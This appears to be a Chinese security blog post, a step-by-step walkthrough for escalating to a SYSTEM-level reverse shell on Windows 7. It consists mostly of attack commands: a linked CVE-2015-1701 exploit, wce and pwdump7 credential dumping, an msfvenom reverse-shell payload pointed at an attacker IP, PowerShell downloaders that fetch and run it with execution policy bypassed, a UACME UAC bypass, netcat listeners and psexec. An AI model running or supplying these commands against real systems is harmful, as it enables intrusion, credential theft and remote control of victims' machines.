MENU

不同用户身份在 Win7 上反弹具有系统权限的 Shell

September 26, 2016 • Security

0x1 普通用户身份

查找目标机器是否安装了补丁,输入如下命令

wmic qfe get  
wmic qfe | find "3057191"

上传编译后的利用程序并运行它

http://github.com/hfiref0x/CVE-2015-1701/raw/master/Compiled/Taihou64.exe

默认情况下其会以系统权限执行 cmd.exe,但我们需要改变源代码以运行我们上传的 danger.exe

http://github.com/hfiref0x/CVE-2015-1701 下载它并定位到 "main.c"

使用 wce.exe 获取已登录用户的明文账号密码

http://www.ampliasecurity.com/research/windows-credentials-editor/  
wce -w

使用 pwdump7 获取其他用户的密码哈希值

http://www.heise.de/download/pwdump.html  

we can try online hash cracking tools such crackstation.net

参考

0x2 管理员身份

msfvenom –p windows/shell_reverse_tcp LHOST=192.168.56.102 –f exe > danger.exe

显示账户配置

net user <login>

Kali 上下载 psexec

http://technet.microsoft.com/en-us/sysinternals/bb897553.aspx

使用 powershell 脚本上传 psexec.exe 到目标机器

echo $client = New-Object System.Net.WebClient > script2.ps1  
echo $targetlocation = "http://192.168.56.102/danger.exe" >> script2.ps1  
echo $client.DownloadFile($targetlocation,"danger.exe") >> script2.ps1  
powershell.exe -ExecutionPolicy Bypass -NonInteractive -File script2.ps1

使用预编译的二进制文件绕过 UAC:

http://github.com/hfiref0x/UACME

使用 powershell 脚本上传 http://github.com/hfiref0x/UACME/blob/master/Compiled/Akagi64.exe 到目标机器

echo $client = New-Object System.Net.WebClient > script2.ps1  
echo $targetlocation = "http://192.168.56.102/Akagi64.exe" >> script3.ps1  
echo $client.DownloadFile($targetlocation,"Akagi64.exe") >> script3.ps1  
powershell.exe -ExecutionPolicy Bypass -NonInteractive -File script3.ps1

在 Kali 上创建监听

nc -lvp 4444

系统权限使用 Akagi64 运行 danger.exe

Akagi64.exe 1 C:\Users\User\Desktop\danger.exe

在 Kali 上创建监听

nc -lvp 4444

下一步就会反弹给我们一个提过权的 shell

以系统权限使用 PsExec 运行 danger.exe

psexec.exe –i –d –accepteula –s danger.exe  
Archives QR Code
QR Code for this page
Tipping QR Code